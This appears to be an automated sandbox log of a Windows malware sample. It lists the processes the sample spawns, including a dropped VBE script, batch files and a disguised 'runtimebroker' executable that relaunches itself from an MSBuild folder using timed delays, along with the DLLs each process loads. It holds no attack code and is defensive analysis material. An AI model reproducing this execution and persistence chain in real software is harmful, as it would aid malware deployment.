                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\AM6p4h9HDRVrPwzz61v07snODxh5fKKX6hWDy9cgUFkUWdr9KsZj3Jw8eGFm.vbe" Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\yu2eKcIww0WQz1diSHkj97Iay5LLlL45l6P5L9G4ltB7.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe "C:\Users\user\AppData\Roaming\msProviderbrowserrefdll/winIntorefruntimebroker.exe"Jump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\5K6fCoMBVq.bat" Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe" Jump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ECvQfnJznV.bat" Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe" Jump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ddp3dI2Wa5.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qlEmwzstBs.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\DoC45cXmCX.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\nhkbaghNki.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\GxEp7zFCwB.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\UCvjmtCiY3.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\bviytIjYVg.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ujuZrulyBl.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\nXpNUGu1Ke.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe"
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\0WKriXx1WO.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                    Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: dxgidebug.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: sfc_os.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: dwmapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: riched20.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: usp10.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: msls31.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: windowscodecs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: textshaping.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: textinputframework.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: coreuicomponents.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: policymanager.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: msvcp110_win.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: pcacli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                                    Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dllJump to behavior
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dllJump to behavior
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dllJump to behavior
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dllJump to behavior
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dllJump to behavior
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dllJump to behavior
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: rasapi32.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: rasman.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: rtutils.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: mswsock.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: winhttp.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: dhcpcsvc.dllJump to behavior
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: dnsapi.dllJump to behavior
